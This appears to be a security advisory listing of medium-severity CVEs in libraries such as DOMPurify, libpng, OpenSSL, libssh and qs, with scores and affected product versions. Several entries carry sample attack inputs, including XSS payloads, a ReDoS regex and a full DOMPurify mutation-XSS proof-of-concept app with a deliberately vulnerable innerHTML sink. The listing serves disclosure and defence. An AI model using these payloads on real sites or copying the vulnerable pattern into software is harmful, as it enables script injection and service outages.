            CVE-2026-39859LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to 10.25.3, liquidjs 10.25.0 documents root as constraining filenames passed to renderFile() and parseFile(), but top-level file loads do not enforce that boundary. A Liquid instance configured with an empty temporary directory as root can return the contents of arbitrary files. This vulnerability is fixed in 10.25.3.MEDIUM

            NVD: n/a

            RedHat: n/a

            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.4.0
            • 9.3.4
            • 9.2.8
            • 9.2.7
            • 9.2.6
            CVE-2026-33349fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. From version 4.0.0-beta.3 to before version 5.5.7, the DocTypeReader in fast-xml-parser uses JavaScript truthy checks to evaluate maxEntityCount and maxEntitySize configuration limits. When a developer explicitly sets either limit to 0 — intending to disallow all entities or restrict entity size to zero bytes — the falsy nature of 0 in JavaScript causes the guard conditions to short-circuit, completely bypassing the limits. An attacker who can supply XML input to such an application can trigger unbounded entity expansion, leading to memory exhaustion and denial of service. This issue has been patched in version 5.5.7.MEDIUM

            NVD: n/a

            RedHat: 5.9

            • 9.3.2
            • 9.3.1
            • 9.3.0
            • 9.2.7
            • 9.2.6
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.2.8
            • 8.19.15
            CVE-2025-14831A flaw was found in GnuTLS. This vulnerability allows a denial of service (DoS) by excessive CPU (Central Processing Unit) and memory consumption via specially crafted malicious certificates containing a large number of name constraints and subject alternative names (SANs).MEDIUM

            NVD: n/a

            RedHat: 5.3

            • 9.3.1
            • 9.3.0
            • 9.2.6
            • 9.2.5
            • 9.2.4
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.2.8
            CVE-2026-22695LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.6.51 to 1.6.53, there is a heap buffer over-read in the libpng simplified API function png_image_finish_read when processing interlaced 16-bit PNGs with 8-bit output format and non-minimal row stride. This is a regression introduced by the fix for CVE-2025-65018. This vulnerability is fixed in 1.6.54.MEDIUM

            NVD: 7.1

            RedHat: 6.1

            • 9.3.1
            • 9.3.0
            • 9.2.6
            • 9.2.5
            • 9.2.4
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.2.8
            CVE-2026-22801LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.6.26 to 1.6.53, there is an integer truncation in the libpng simplified write API functions png_write_image_16bit and png_write_image_8bit causes heap buffer over-read when the caller provides a negative row stride (for bottom-up image layouts) or a stride exceeding 65535 bytes. The bug was introduced in libpng 1.6.26 (October 2016) by casts added to silence compiler warnings on 16-bit systems. This vulnerability is fixed in 1.6.54.MEDIUM

            NVD: 7.8

            RedHat: 6.6

            • 9.3.1
            • 9.3.0
            • 9.2.6
            • 9.2.5
            • 9.2.4
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.2.8
            CVE-2025-15366The imaplib module, when passed a user-controlled command, can have additional commands injected using newlines. Mitigation rejects commands containing control characters.MEDIUM

            NVD: n/a

            RedHat: 7.1

            • 9.3.1
            • 9.3.0
            • 9.2.6
            • 9.2.5
            • 9.2.4
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.2.8
            CVE-2025-15367The poplib module, when passed a user-controlled command, can have additional commands injected using newlines. Mitigation rejects commands containing control characters.MEDIUM

            NVD: n/a

            RedHat: 7.1

            • 9.3.1
            • 9.3.0
            • 9.2.6
            • 9.2.5
            • 9.2.4
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.2.8
            CVE-2026-0865User-controlled header names and values containing newlines can allow injecting HTTP headers.MEDIUM

            NVD: n/a

            RedHat: 4.5

            • 9.3.1
            • 9.3.0
            • 9.2.6
            • 9.2.5
            • 9.2.4
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.2.8
            CVE-2026-1299The email module, specifically the "BytesGenerator" class, didn’t properly quote newlines for email headers when serializing an email message allowing for header injection when an email is serialized. This is only applicable if using "LiteralHeader" writing headers that don't respect email folding rules, the new behavior will reject the incorrectly folded headers in "BytesGenerator".MEDIUM

            NVD: n/a

            RedHat: 7.1

            • 9.3.1
            • 9.3.0
            • 9.2.6
            • 9.2.5
            • 9.2.4
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.2.8
            CVE-2025-69873ajv (Another JSON Schema Validator) before 8.18.0 is vulnerable to Regular Expression Denial of Service (ReDoS) when the $data option is enabled. The pattern keyword accepts runtime data via JSON Pointer syntax ($data reference), which is passed directly to the JavaScript RegExp() constructor without validation. An attacker can inject a malicious regex pattern (e.g., "^(a|a)*$") combined with crafted input to cause catastrophic backtracking. A 31-character payload causes approximately 44 seconds of CPU blocking, with each additional character doubling execution time. This enables complete denial of service with a single HTTP request against any API using ajv with $data: true for dynamic schema validation. This issue is also fixed in version 6.14.0.MEDIUM

            NVD: n/a

            RedHat: 7.5

            • 9.3.1
            • 9.3.0
            • 9.2.6
            • 9.2.5
            • 9.2.4
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.2.8
            CVE-2026-0540DOMPurify 3.1.3 through 3.3.1 and 2.5.3 through 2.5.8, fixed in commit 2726c74, contain a cross-site scripting vulnerability that allows attackers to bypass attribute sanitization by exploiting five missing rawtext elements (noscript, xmp, noembed, noframes, iframe) in the SAFE_FOR_XML regex. Attackers can include payloads like </noscript><img src=x onerror=alert(1)> in attribute values to execute JavaScript when sanitized output is placed inside these unprotected rawtext contexts.MEDIUM

            NVD: n/a

            RedHat: 6.1

            • 9.3.1
            • 9.3.0
            • 9.2.6
            • 9.2.5
            • 9.2.4
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.2.8
            GHSA-cj63-jhhr-wcxv## Summary When `USE_PROFILES` is enabled, DOMPurify rebuilds `ALLOWED_ATTR` as a plain array before populating it with the requested allowlists. Because the sanitizer still looks up attributes via `ALLOWED_ATTR[lcName]`, any `Array.prototype` property that is polluted also counts as an allowlisted attribute. An attacker who can set `Array.prototype.onclick = true` (or a runtime already subject to prototype pollution) can thus force DOMPurify to keep event handlers such as `onclick` even when they are normally forbidden. The provided PoC sanitizes `<img onclick=...>` with `USE_PROFILES` and adds the sanitized output to the DOM; the polluted prototype allows the event handler to survive and execute, turning what should be a blocklist into a silent XSS vector. ## Impact Prototype pollution makes DOMPurify accept dangerous event handler attributes, which bypasses the sanitizer and results in DOM-based XSS once the sanitized markup is rendered. ## Credits Identified by Cantina’s Apex (https://www.cantina.security).MEDIUM

            NVD: n/a

            RedHat: n/a

            • 9.3.1
            • 9.3.0
            • 9.2.6
            • 9.2.5
            • 9.2.4
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.2.8
            GHSA-cjmm-f4jc-qw8r## Summary DOMPurify allows `ADD_ATTR` to be provided as a predicate function via `EXTRA_ELEMENT_HANDLING.attributeCheck`. When the predicate returns `true`, `_isValidAttribute` short-circuits the attribute check before URI-safe validation runs. An attacker who supplies a predicate that accepts specific attribute/tag combinations can then sanitize input such as `<a href="javascript:alert(document.domain)">` and have the `javascript:` URL survive, because URI validation is skipped for that attribute while other checks still pass. The provided PoC accepts `href` for anchors and then triggers a click inside an iframe, showing that the sanitized payload executes despite the protocol bypass. ## Impact Predicate-based allowlisting bypasses DOMPurify's URI validation, allowing unsafe protocols such as `javascript:` to reach the DOM and execute whenever the link is activated, resulting in DOM-based XSS. ## Credits Identified by Cantina’s Apex (https://www.cantina.security).MEDIUM

            NVD: n/a

            RedHat: n/a

            • 9.3.1
            • 9.3.0
            • 9.2.6
            • 9.2.5
            • 9.2.4
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.2.8
            GHSA-h8r8-wccr-v5f2## Description A mutation-XSS (mXSS) condition was confirmed when sanitized HTML is reinserted into a new parsing context using `innerHTML` and special wrappers. The vulnerable wrappers confirmed in browser behavior are `script`, `xmp`, `iframe`, `noembed`, `noframes`, and `noscript`. The payload remains seemingly benign after `DOMPurify.sanitize()`, but mutates during the second parse into executable markup with an event handler, enabling JavaScript execution in the client (`alert(1)` in the PoC). ## Vulnerability The root cause is context switching after sanitization: sanitized output is treated as trusted and concatenated into a wrapper string (for example, `<xmp> ... </xmp>` or other special wrappers) before being reparsed by the browser. In this flow, attacker-controlled text inside an attribute (for example `</xmp>` or equivalent closing sequences for each wrapper) closes the special parsing context early and reintroduces attacker markup (`<img ... onerror=...>`) outside the original attribute context. DOMPurify sanitizes the original parse tree, but the application performs a second parse in a different context, reactivating dangerous tokens (classic mXSS pattern). ## PoC 1. Start the PoC app: ```bash npm install npm start ``` 2. Open `http://localhost:3001`. 3. Set `Wrapper en sink` to `xmp`. 4. Use payload: ```html <img src=x alt="</xmp><img src=x onerror=alert('expoc')>"> ``` 5. Click `Sanitize + Render`. 6. Observe: - `Sanitized response` still contains the `</xmp>` sequence inside `alt`. - The sink reparses to include `<img src="x" onerror="alert('expoc')">`. - `alert('expoc')` is triggered. 7. Files: - index.html ```html <!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>expoc - DOMPurify SSR PoC</title> <style> :root { --bg: #f7f8fb; --panel: #ffffff; --line: #d8dce6; --text: #0f172a; --muted: #475569; --accent: #0ea5e9; } * { box-sizing: border-box; } body { margin: 0; font-family: "SF Mono", Menlo, Consolas, monospace; color: var(--text); background: radial-gradient(circle at 10% 0%, #e0f2fe 0%, var(--bg) 60%); } main { max-width: 980px; margin: 28px auto; padding: 0 16px 20px; } h1 { margin: 0 0 10px; font-size: 1.45rem; } p { margin: 0; color: var(--muted); } .grid { display: grid; gap: 14px; margin-top: 16px; } .card { background: var(--panel); border: 1px solid var(--line); border-radius: 12px; padding: 14px; } label { display: block; margin-bottom: 7px; font-size: 0.85rem; color: var(--muted); } textarea, input, select, button { width: 100%; border: 1px solid var(--line); border-radius: 8px; padding: 9px 10px; font: inherit; background: #fff; } textarea { min-height: 110px; resize: vertical; } .row { display: grid; grid-template-columns: 1fr 230px; gap: 12px; } button { cursor: pointer; background: var(--accent); color: #fff; border-color: #0284c7; } #sink { min-height: 90px; border: 1px dashed #94a3b8; border-radius: 8px; padding: 10px; background: #f8fafc; } pre { margin: 0; white-space: pre-wrap; word-break: break-word; } .note { margin-top: 8px; font-size: 0.85rem; } .status-grid { display: grid; grid-template-columns: repeat(auto-fit, minmax(180px, 1fr)); gap: 8px; margin-top: 10px; } .status-item { border: 1px solid var(--line); border-radius: 8px; padding: 8px 10px; font-size: 0.85rem; background: #fff; } .status-item.vuln { border-color: #ef4444; background: #fef2f2; } .status-item.safe { border-color: #22c55e; background: #f0fdf4; } @media (max-width: 760px) { .row { grid-template-columns: 1fr; } } </style> </head> <body> <main> <h1>expoc - DOMPurify Server-Side PoC</h1> <p> Flujo: input -> POST /sanitize (Node + jsdom + DOMPurify) -> render vulnerable con innerHTML. </p> <div class="grid"> <section class="card"> <label for="payload">Payload</label> <textarea id="payload"><img src=x alt="</script><img src=x onerror=alert('expoc')>"></textarea> <div class="row" style="margin-top: 10px;"> <div> <label for="wrapper">Wrapper en sink</label> <select id="wrapper"> <option value="div">div</option> <option value="textarea">textarea</option> <option value="title">title</option> <option value="style">style</option> <option value="script" selected>script</option> <option value="xmp">xmp</option> <option value="iframe">iframe</option> <option value="noembed">noembed</option> <option value="noframes">noframes</option> <option value="noscript">noscript</option> </select> </div> <div style="display:flex;align-items:end;"> <button id="run" type="button">Sanitize + Render</button> </div> </div> <p class="note">Se usa render vulnerable: <code>sink.innerHTML = '&lt;wrapper&gt;' + sanitized + '&lt;/wrapper&gt;'</code>.</p> <div class="status-grid"> <div class="status-item vuln">script (vulnerable)</div> <div class="status-item vuln">xmp (vulnerable)</div> <div class="status-item vuln">iframe (vulnerable)</div> <div class="status-item vuln">noembed (vulnerable)</div> <div class="status-item vuln">noframes (vulnerable)</div> <div class="status-item vuln">noscript (vulnerable)</div> <div class="status-item safe">div (no vulnerable)</div> <div class="status-item safe">textarea (no vulnerable)</div> <div class="status-item safe">title (no vulnerable)</div> <div class="status-item safe">style (no vulnerable)</div> </div> </section> <section class="card"> <label>Sanitized response</label> <pre id="sanitized">(empty)</pre> </section> <section class="card"> <label>Sink</label> <div id="sink"></div> </section> </div> </main> <script> const payload = document.getElementById('payload'); const wrapper = document.getElementById('wrapper'); const run = document.getElementById('run'); const sanitizedNode = document.getElementById('sanitized'); const sink = document.getElementById('sink'); run.addEventListener('click', async () => { const response = await fetch('/sanitize', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ input: payload.value }) }); const data = await response.json(); const sanitized = data.sanitized || ''; const w = wrapper.value; sanitizedNode.textContent = sanitized; sink.innerHTML = '<' + w + '>' + sanitized + '</' + w + '>'; }); </script> </body> </html> ``` - server.js ```js const express = require('express'); const path = require('path'); const { JSDOM } = require('jsdom'); const createDOMPurify = require('dompurify'); const app = express(); const port = process.env.PORT || 3001; const window = new JSDOM('').window; const DOMPurify = createDOMPurify(window); app.use(express.json()); app.use(express.static(path.join(__dirname, 'public'))); app.get('/health', (_req, res) => { res.json({ ok: true, service: 'expoc' }); }); app.post('/sanitize', (req, res) => { const input = typeof req.body?.input === 'string' ? req.body.input : ''; const sanitized = DOMPurify.sanitize(input); res.json({ sanitized }); }); app.listen(port, () => { console.log(`expoc running at http://localhost:${port}`); }); ``` - package.json ```json { "name": "expoc", "version": "1.0.0", "main": "server.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1", "start": "node server.js", "dev": "node server.js" }, "keywords": [], "author": "", "license": "ISC", "description": "", "dependencies": { "dompurify": "^3.3.1", "express": "^5.2.1", "jsdom": "^28.1.0" } } ``` ## Evidence - PoC [daft-video.webm](https://github.com/user-attachments/assets/499a593d-0241-4ab8-95a9-cf49a00bda90) - XSS triggered <img width="2746" height="1588" alt="daft-img" src="https://github.com/user-attachments/assets/1f463c14-d5a3-4c93-94e4-12d2d02c7d15" /> ## Why This Happens This is a mutation-XSS pattern caused by a parse-context mismatch: - Parse 1 (sanitization phase): input is interpreted under normal HTML parsing rules. - Parse 2 (sink phase): sanitized output is embedded into a wrapper that changes parser state (`xmp` raw-text behavior). - Attacker-controlled sequence (`</xmp>`) gains structural meaning in parse 2 and alters DOM structure. Sanitization is not a universal guarantee across all future parsing contexts. The sink design reintroduces risk. ## Remediation Guidance 1. Do not concatenate sanitized strings into new HTML wrappers followed by `innerHTML`. 2. Keep the rendering context stable from sanitize to sink. 3. Prefer DOM-safe APIs (`textContent`, `createElement`, `setAttribute`) over string-based HTML composition. 4. If HTML insertion is required, sanitize as close as possible to final insertion context and avoid wrapper constructs with raw-text semantics (`xmp`, `script`, etc.). 5. Add regression tests for context-switch/mXSS payloads (including `</xmp>`, `</noscript>`, similar parser-breakout markers). Reported by Oscar Uribe, Security Researcher at Fluid Attacks. Camilo Vera and Cristian Vargas from the Fluid Attacks Research Team have identified a mXSS via Re-Contextualization in DomPurify 3.3.1. Following Fluid Attacks [Disclosure Policy](https://fluidattacks.com/advisories/policy), if this report corresponds to a vulnerability and the conditions outlined in the policy are met, this advisory will be published on the website over the next few days (the timeline may vary depending on maintainers' willingness to attend to and respond to this report) at the following URL: https://fluidattacks.com/advisories/daft Acknowledgements: [Camilo Vera](https://github.com/caverav/) and [Cristian Vargas](https://github.com/tachote).MEDIUM

            NVD: n/a

            RedHat: n/a

            • 9.3.1
            • 9.3.0
            • 9.2.6
            • 9.2.5
            • 9.2.4
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.2.8
            CVE-2026-2327Versions of the package markdown-it from 13.0.0 and before 14.1.1 are vulnerable to Regular Expression Denial of Service (ReDoS) due to the use of the regex /\*+$/ in the linkify function. An attacker can supply a long sequence of * characters followed by a non-matching character, which triggers excessive backtracking and may lead to a denial-of-service condition.MEDIUM

            NVD: 7.5

            RedHat: 7.5

            • 9.3.1
            • 9.3.0
            • 9.2.6
            • 9.2.5
            • 9.2.4
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.2.8
            CVE-2025-15284Improper Input Validation vulnerability in qs (parse modules) allows HTTP DoS.This issue affects qs: < 6.14.1. Summary The arrayLimit option in qs did not enforce limits for bracket notation (a[]=1&a[]=2), only for indexed notation (a[0]=1). This is a consistency bug; arrayLimit should apply uniformly across all array notations. Note: The default parameterLimit of 1000 effectively mitigates the DoS scenario originally described. With default options, bracket notation cannot produce arrays larger than parameterLimit regardless of arrayLimit, because each a[]=valueconsumes one parameter slot. The severity has been reduced accordingly. Details The arrayLimit option only checked limits for indexed notation (a[0]=1&a[1]=2) but did not enforce it for bracket notation (a[]=1&a[]=2). Vulnerable code (lib/parse.js:159-162): if (root === '[]' && options.parseArrays) { obj = utils.combine([], leaf); // No arrayLimit check } Working code (lib/parse.js:175): else if (index <= options.arrayLimit) { // Limit checked here obj = []; obj[index] = leaf; } The bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index <= options.arrayLimit before creating arrays. PoC const qs = require('qs'); const result = qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6', { arrayLimit: 5 }); console.log(result.a.length); // Output: 6 (should be max 5) Note on parameterLimit interaction: The original advisory's "DoS demonstration" claimed a length of 10,000, but parameterLimit (default: 1000) caps parsing to 1,000 parameters. With default options, the actual output is 1,000, not 10,000. Impact Consistency bug in arrayLimit enforcement. With default parameterLimit, the practical DoS risk is negligible since parameterLimit already caps the total number of parsed parameters (and thus array elements from bracket notation). The risk increases only when parameterLimit is explicitly set to a very high value.MEDIUM

            NVD: n/a

            RedHat: 7.5

            • 9.3.1
            • 9.3.0
            • 9.2.6
            • 9.2.5
            • 9.2.4
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.2.8
            CVE-2026-31988yauzl (aka Yet Another Unzip Library) version 3.2.0 for Node.js contains an off-by-one error in the NTFS extended timestamp extra field parser within the getLastModDate() function. The while loop condition checks cursor < data.length + 4 instead of cursor + 4 <= data.length, allowing readUInt16LE() to read past the buffer boundary. A remote attacker can cause a denial of service (process crash via ERR_OUT_OF_RANGE exception) by sending a crafted zip file with a malformed NTFS extra field. This affects any Node.js application that processes zip file uploads and calls entry.getLastModDate() on parsed entries. Fixed in version 3.2.1.MEDIUM

            NVD: n/a

            RedHat: 5.3

            • 9.3.1
            • 9.3.0
            • 9.2.6
            • 9.2.5
            • 9.2.4
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.2.8
            CVE-2026-2781Integer overflow in the Libraries component in NSS. This vulnerability was fixed in Firefox 148, Firefox ESR 140.8, Thunderbird 148, Thunderbird 140.8, and Firefox ESR 115.35.MEDIUM

            NVD: 9.8

            RedHat: 6.1

            • 8.19.12
            • 8.19.11
            • 8.19.10
            • 8.19.9
            • 8.19.8
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2026-3731A weakness has been identified in libssh up to 0.11.3. The impacted element is the function sftp_extensions_get_name/sftp_extensions_get_data of the file src/sftp.c of the component SFTP Extension Name Handler. Executing a manipulation of the argument idx can lead to out-of-bounds read. The attack may be performed from remote. Upgrading to version 0.11.4 and 0.12.0 is sufficient to resolve this issue. This patch is called 855a0853ad3abd4a6cd85ce06fce6d8d4c7a0b60. You should upgrade the affected component.MEDIUM

            NVD: 7.5

            RedHat: 5.3

            • 8.19.12
            • 8.19.11
            • 8.19.10
            • 8.19.9
            • 8.19.8
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-90861. A cookie is set using the `secure` keyword for `https://target` 2. curl is redirected to or otherwise made to speak with `http://target` (same hostname, but using clear text HTTP) using the same cookie set 3. The same cookie name is set - but with just a slash as path (`path=\"/\",`). Since this site is not secure, the cookie *should* just be ignored. 4. A bug in the path comparison logic makes curl read outside a heap buffer boundary The bug either causes a crash or it potentially makes the comparison come to the wrong conclusion and lets the clear-text site override the contents of the secure cookie, contrary to expectations and depending on the memory contents immediately following the single-byte allocation that holds the path. The presumed and correct behavior would be to plainly ignore the second set of the cookie since it was already set as secure on a secure host so overriding it on an insecure host should not be okay.MEDIUM

            NVD: n/a

            RedHat: 5.3

            • 9.3.0
            • 9.2.5
            • 9.2.4
            • 9.2.3
            • 9.2.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2026-0915Calling getnetbyaddr or getnetbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend for networks and queries for a zero-valued network in the GNU C Library version 2.0 to version 2.42 can leak stack contents to the configured DNS resolver.MEDIUM

            NVD: n/a

            RedHat: 5.3

            • 9.3.0
            • 9.2.5
            • 9.2.4
            • 9.2.3
            • 9.2.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-14104A flaw was found in util-linux. This vulnerability allows a heap buffer overread when processing 256-byte usernames, specifically within the `setpwnam()` function, affecting SUID (Set User ID) login-utils utilities writing to the password database.MEDIUM

            NVD: n/a

            RedHat: 6.1

            • 9.3.0
            • 9.2.5
            • 9.2.4
            • 9.2.3
            • 9.2.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-11187Issue summary: PBMAC1 parameters in PKCS#12 files are missing validation which can trigger a stack-based buffer overflow, invalid pointer or NULL pointer dereference during MAC verification. Impact summary: The stack buffer overflow or NULL pointer dereference may cause a crash leading to Denial of Service for an application that parses untrusted PKCS#12 files. The buffer overflow may also potentially enable code execution depending on platform mitigations. When verifying a PKCS#12 file that uses PBMAC1 for the MAC, the PBKDF2 salt and keylength parameters from the file are used without validation. If the value of keylength exceeds the size of the fixed stack buffer used for the derived key (64 bytes), the key derivation will overflow the buffer. The overflow length is attacker-controlled. Also, if the salt parameter is not an OCTET STRING type this can lead to invalid or NULL pointer dereference. Exploiting this issue requires a user or application to process a maliciously crafted PKCS#12 file. It is uncommon to accept untrusted PKCS#12 files in applications as they are usually used to store private keys which are trusted by definition. For this reason the issue was assessed as Moderate severity. The FIPS modules in 3.6, 3.5 and 3.4 are not affected by this issue, as PKCS#12 processing is outside the OpenSSL FIPS module boundary. OpenSSL 3.6, 3.5 and 3.4 are vulnerable to this issue. OpenSSL 3.3, 3.0, 1.1.1 and 1.0.2 are not affected by this issue as they do not support PBMAC1 in PKCS#12.MEDIUM

            NVD: n/a

            RedHat: 6.1

            • 9.3.0
            • 9.2.5
            • 9.2.4
            • 9.2.3
            • 9.2.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-69419Issue summary: Calling PKCS12_get_friendlyname() function on a maliciously crafted PKCS#12 file with a BMPString (UTF-16BE) friendly name containing non-ASCII BMP code point can trigger a one byte write before the allocated buffer. Impact summary: The out-of-bounds write can cause a memory corruption which can have various consequences including a Denial of Service. The OPENSSL_uni2utf8() function performs a two-pass conversion of a PKCS#12 BMPString (UTF-16BE) to UTF-8. In the second pass, when emitting UTF-8 bytes, the helper function bmp_to_utf8() incorrectly forwards the remaining UTF-16 source byte count as the destination buffer capacity to UTF8_putc(). For BMP code points above U+07FF, UTF-8 requires three bytes, but the forwarded capacity can be just two bytes. UTF8_putc() then returns -1, and this negative value is added to the output length without validation, causing the length to become negative. The subsequent trailing NUL byte is then written at a negative offset, causing write outside of heap allocated buffer. The vulnerability is reachable via the public PKCS12_get_friendlyname() API when parsing attacker-controlled PKCS#12 files. While PKCS12_parse() uses a different code path that avoids this issue, PKCS12_get_friendlyname() directly invokes the vulnerable function. Exploitation requires an attacker to provide a malicious PKCS#12 file to be parsed by the application and the attacker can just trigger a one zero byte write before the allocated buffer. For that reason the issue was assessed as Low severity according to our Security Policy. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the PKCS#12 implementation is outside the OpenSSL FIPS module boundary. OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue. OpenSSL 1.0.2 is not affected by this issue.MEDIUM

            NVD: n/a

            RedHat: 7.4

            • 9.3.0
            • 9.2.5
            • 9.2.4
            • 9.2.3
            • 9.2.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-13465Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset and _.omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes. The issue permits deletion of properties but does not allow overwriting their original behavior. This issue is patched on 4.17.23MEDIUM

            NVD: 5.3

            RedHat: 8.2

            • 9.3.0
            • 9.2.5
            • 9.2.4
            • 9.2.3
            • 9.2.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2026-25210In libexpat before 2.7.4, the doContent function does not properly determine the buffer size bufSize because there is no integer overflow check for tag buffer reallocation.MEDIUM

            NVD: 7.8

            RedHat: 6.9

            • 8.19.11
            • 8.19.10
            • 8.19.9
            • 8.19.8
            • 8.19.7
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-28162Buffer Overflow vulnerability in libpng 1.6.43-1.6.46 allows a local attacker to cause a denial of service via the pngimage with AddressSanitizer (ASan), the program leaks memory in various locations, eventually leading to high memory usage and causing the program to become unresponsiveMEDIUM

            NVD: n/a

            RedHat: 6.2

            • 8.19.11
            • 8.19.10
            • 8.19.9
            • 8.19.8
            • 8.19.7
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2026-0964A malicious SCP server can send unexpected paths that could make the client application override local files outside of working directory. This could be misused to create malicious executable or configuration files and make the user execute them under specific consequences. This is the same issue as in OpenSSH, tracked as CVE-2019-6111.MEDIUM

            NVD: 6.3

            RedHat: 5

            • 8.19.11
            • 8.19.10
            • 8.19.9
            • 8.19.8
            • 8.19.7
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2026-0967A flaw was found in libssh. A remote attacker, by controlling client configuration files or known_hosts files, could craft specific hostnames that when processed by the `match_pattern()` function can lead to inefficient regular expression backtracking. This can cause timeouts and resource exhaustion, resulting in a Denial of Service (DoS) for the client.MEDIUM

            NVD: 5.5

            RedHat: 2.2

            • 8.19.11
            • 8.19.10
            • 8.19.9
            • 8.19.8
            • 8.19.7
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2026-0968A flaw was found in libssh in which a malicious SFTP (SSH File Transfer Protocol) server can exploit this by sending a malformed 'longname' field within an `SSH_FXP_NAME` message during a file listing operation. This missing null check can lead to reading beyond allocated memory on the heap. This can cause unexpected behavior or lead to a denial of service (DoS) due to application crashes.MEDIUM

            NVD: 3.1

            RedHat: 3.1

            • 8.19.11
            • 8.19.10
            • 8.19.9
            • 8.19.8
            • 8.19.7
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-13601A heap-based buffer overflow problem was found in glib through an incorrect calculation of buffer size in the g_escape_uri_string() function. If the string to escape contains a very large number of unacceptable characters (which would need escaping), the calculation of the length of the escaped string could overflow, leading to a potential write off the end of the newly allocated string.MEDIUM

            NVD: n/a

            RedHat: 7.7

            • 9.2.4
            • 9.2.3
            • 9.2.2
            • 9.2.1
            • 9.2.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-12084When building nested elements using xml.dom.minidom methods such as appendChild() that have a dependency on _clear_id_cache() the algorithm is quadratic. Availability can be impacted when building excessively nested documents.MEDIUM

            NVD: 5.3

            RedHat: 7.5

            • 9.2.4
            • 9.2.3
            • 9.2.2
            • 9.2.1
            • 9.2.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2026-22036Undici is an HTTP/1.1 client for Node.js. Prior to 7.18.0 and 6.23.0, the number of links in the decompression chain is unbounded and the default maxHeaderSize allows a malicious server to insert thousands compression steps leading to high CPU usage and excessive memory allocation. This vulnerability is fixed in 7.18.0 and 6.23.0.MEDIUM

            NVD: 7.5

            RedHat: 3.7

            • 9.2.4
            • 9.2.3
            • 9.2.2
            • 9.2.1
            • 9.2.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-66293LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to 1.6.52, an out-of-bounds read vulnerability in libpng's simplified API allows reading up to 1012 bytes beyond the png_sRGB_base[512] array when processing valid palette PNG images with partial transparency and gamma correction. The PNG files that trigger this vulnerability are valid per the PNG specification; the bug is in libpng's internal state management. Upgrade to libpng 1.6.52 or later.MEDIUM

            NVD: n/a

            RedHat: 7.1

            • 9.2.3
            • 9.2.2
            • 9.2.1
            • 9.2.0
            • 9.1.9
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-6069The html.parser.HTMLParser class had worse-case quadratic complexity when processing certain crafted malformed inputs potentially leading to amplified denial-of-service.MEDIUM

            NVD: n/a

            RedHat: 4.3

            • 9.2.3
            • 9.2.2
            • 9.2.1
            • 9.2.0
            • 9.1.9
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
